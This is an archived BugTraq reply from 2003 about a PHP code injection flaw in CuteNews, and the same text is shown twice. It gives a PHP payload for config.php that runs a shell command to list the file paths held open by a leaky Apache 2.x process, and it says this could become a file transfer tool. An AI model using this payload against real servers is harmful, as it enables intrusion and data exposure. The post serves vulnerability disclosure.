BugTraq
Back to list
|
Post reply
Re: PHP code injection in CuteNews
Feb 28 2003 10:18PM
Steve Grubb (linux_4ever yahoo com)
In-Reply-To: <E18ndJT-000JS2-00 (at) f19.mail (dot) ru [email concealed]>
Hello,
If the cutenews website is running apache 2.x which
leaks descriptors to all kinds of things
http://marc.theaimsgroup.com/?l=vuln-dev&m=104585997219471&w=2
Then you can do this:
config.php =
<html><head><title>File List</title></head>
<body> <?php
$cmd = "/bin/ls -l /proc/$$/fd";
exec($cmd, $dir_listing, $status);
foreach($dir_listing as $item) {
$match = preg_split("/> /", $item);
if ($match[1]) {
if (preg_match("/\//", $match[1])) {
echo $match[1]; echo "<br>";
}
}
}
?> </body></html>
it doesn't take alot more to make this a fully
clickable file transfer utility that Sandboxes or Jails
cannot protect.
-Steve Grubb
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Hello,
If the cutenews website is running apache 2.x which
leaks descriptors to all kinds of things
http://marc.theaimsgroup.com/?l=vuln-dev&m=104585997219471&w=2
Then you can do this:
config.php =
<html><head><title>File List</title></head>
<body> <?php
$cmd = "/bin/ls -l /proc/$$/fd";
exec($cmd, $dir_listing, $status);
foreach($dir_listing as $item) {
$match = preg_split("/> /", $item);
if ($match[1]) {
if (preg_match("/\//", $match[1])) {
echo $match[1]; echo "<br>";
}
}
}
?> </body></html>
it doesn't take alot more to make this a fully
clickable file transfer utility that Sandboxes or Jails
cannot protect.
-Steve Grubb
[ reply ]